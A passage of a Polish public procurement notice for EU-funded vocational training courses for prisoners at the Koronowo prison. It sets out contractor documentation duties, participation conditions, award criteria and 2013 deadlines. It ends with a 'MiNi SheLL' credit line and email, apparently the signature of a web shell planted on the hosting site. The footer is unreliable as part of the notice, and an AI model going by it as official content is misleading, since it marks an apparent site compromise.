treści nauczania w zakresie poszczególnych zajęć;
opis efektów kształcenia;
wykaz literatury oraz niezbędnych środków i materiałów dydaktycznych;

3) szczegółowy harmonogram zajęć; 
4) dobranie poziomu wiedzy i doświadczenia wykładowców do tematyki szkolenia;

Ponadto:

1) przeprowadzenie zajęć musi się odbyć zgodnie z ustaloną liczbą godzin, bez względu na ewentualne przerwy (choroby wykładowców, święta, dni wolne, awarie itp.)
2) wykonawca jest zobowiązany do prowadzenia dokumentacji przebiegu szkolenia tj. m.in.: 

program nauczania,
dziennika zajęć zawierającego listę obecności (podpisywaną niebieskim lub zielonym
długopisem przez beneficjentów ostatecznych), wymiar godzin, tematy zajęć
edukacyjnych;
listy obecności na których beneficjenci składają podpis długopisem koloru
niebieskiego, a które po zakończeniu zajęć zostaną przekazane Zamawiającemu,
ewidencję wydanych zaświadczeń,
kserokopie wydanych zaświadczeń (Wykonawca przekazuje Zamawiającemu dwa
egzemplarze kserokopii wydanych zaświadczeń),
wykaz wydanych zaświadczeń i certyfikatów wraz z potwierdzonym przez uczestników
kursu ich odbiorem,
wykaz przekazanych materiałów oraz środków ochrony indywidualnej wraz z
potwierdzonym przez uczestników kursu ich odbiorem,
Jeden egzemplarz materiałów szkoleniowych przekazanych beneficjentom, który po
zakończeniu szkolenia zostanie dołączony do dokumentacji Zamawiającego,
    Przeprowadzone ankiety na temat zajęć aktywizacji,
Dokumenty potwierdzające ubezpieczenie uczestników,
Faktury VAT lub rachunki potwierdzające dostarczenie materiałów w wymaganej ilości
(kserokopie dokumentów wraz ze sporządzoną kalkulacją wykonanej usługi należy
dołączyć do dokumentacji kursowej przekazywanej Zamawiającemu po zakończeniu
szkolenia),

3) wykonawca jest zobowiązany do przeprowadzenia ankiet umożliwiających ocenę szkolenia absolwentom;
4) listę obecności podpisywaną niebieskim lub zielonym długopisem przez beneficjentów ostatecznych.

- Wykonawca zobowiązuje się do oznaczania dokumentacji i materiałów kursów znakami zgodnymi z wytycznymi dotyczącymi oznaczania projektów w ramach Programu Operacyjnego Kapitał Ludzki.

Zamawiający udostępnia sprzęt zakupiony w ramach Programu Operacyjnego Kapitał Ludzki współfinansowany ze Środków Europejskiego Funduszu Społecznego..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8, 80.53.00.00-8, 80.53.00.00-8, 80.50.00.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.05.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana na zasadzie: spełnia lub nie spełnia poszczególne warunki.
2. Zamawiający dokona oceny spełnienia poszczególnych warunków udziału w postępowaniu, na podstawie złożonego do oferty podpisanego oświadczenia, o którym mowa w siwz rozdział IX tj.
1) podpisane oświadczenie, o spełnianiu warunków udziału w postępowaniu oraz o wpisie wykonawcy do rejestru instytucji szkoleniowych (załącznik nr 2 do siwz).</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana na zasadzie: spełnia lub nie spełnia poszczególne warunki.
2. Zamawiający dokona oceny spełnienia poszczególnych warunków udziału w postępowaniu, na podstawie złożonego do oferty podpisanego oświadczenia, o którym mowa w siwz rozdział IX tj.
1) podpisane oświadczenie, o spełnianiu warunków udziału w postępowaniu oraz o wpisie wykonawcy do rejestru instytucji szkoleniowych (załącznik nr 2 do siwz).</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana na zasadzie: spełnia lub nie spełnia poszczególne warunki.
2. Zamawiający dokona oceny spełnienia poszczególnych warunków udziału w postępowaniu, na podstawie złożonego do oferty podpisanego oświadczenia, o którym mowa w siwz rozdział IX tj.
1) podpisane oświadczenie, o spełnianiu warunków udziału w postępowaniu oraz o wpisie wykonawcy do rejestru instytucji szkoleniowych (załącznik nr 2 do siwz).</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana na zasadzie: spełnia lub nie spełnia poszczególne warunki.
2. Zamawiający dokona oceny spełnienia poszczególnych warunków udziału w postępowaniu, na podstawie złożonego do oferty podpisanego oświadczenia, o którym mowa w siwz rozdział IX tj.
1) podpisane oświadczenie, o spełnianiu warunków udziału w postępowaniu oraz o wpisie wykonawcy do rejestru instytucji szkoleniowych (załącznik nr 2 do siwz).</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana na zasadzie: spełnia lub nie spełnia poszczególne warunki.
2. Zamawiający dokona oceny spełnienia poszczególnych warunków udziału w postępowaniu, na podstawie złożonego do oferty podpisanego oświadczenia, o którym mowa w siwz rozdział IX tj.
1) podpisane oświadczenie, o spełnianiu warunków udziału w postępowaniu oraz o wpisie wykonawcy do rejestru instytucji szkoleniowych (załącznik nr 2 do siwz).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.  Strony ustalają, że treść umowy może ulec zmianie zgodnie z art. 144 ustawy Prawo zamówień publicznych (Dz. U. z 2007r. Nr 223, poz. 1655, z póź. zm. )
2. Zmiany postanowień niniejszej umowy mogą dotyczyć w szczególności:
1. nazwy, adresu oraz osób reprezentujących strony,
2. urzędowej stawki podatku VAT na świadczenie niniejszej usługi szkolenia;
3. każdej zmiany, która jest korzystna lub neutralna dla zamawiającego, lub zmiany której nie można było przewidzieć na etapie prowadzonego postępowania o udzielenie zamówienia publicznego;
3. Zmiany postanowień niniejszej umowy wymagają potwierdzenia pisemnego w postaci aneksu.
4.Strona wnioskująca o zmianę postanowień niniejszej umowy na podstawie ust. 2 niezwłocznie i pisemnie powiadamia o tym fakcie drugą stronę, uzasadniając zmianę okolicznościami faktycznymi i prawnymi oraz przedkłada propozycję aneksu do umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zp.sw.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zakład Karny Koronowo
ul. Bydgoska 27
86-010 Koronowo.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 20.02.2013 godzina 11:00, miejsce: Zakład Karny Koronowo
ul. Bydgoska 27
86-010 Koronowo
sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Przedmiot zamówienia współfinansowany ze środków Europejskiego Funduszu Społecznego w ramach Poddziałania 1.3.4. Programu Operacyjnego Kapitał Ludzki 2007-2013 w związku z realizacją projektu Cykl szkoleniowo-aktywizacyjny służący podniesieniu kwalifikacji zawodowych osób pozbawionych wolności oraz przygotowaniu ich do powrotu na rynek pracy po zakończeniu odbywania kary pozbawienia wolności..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com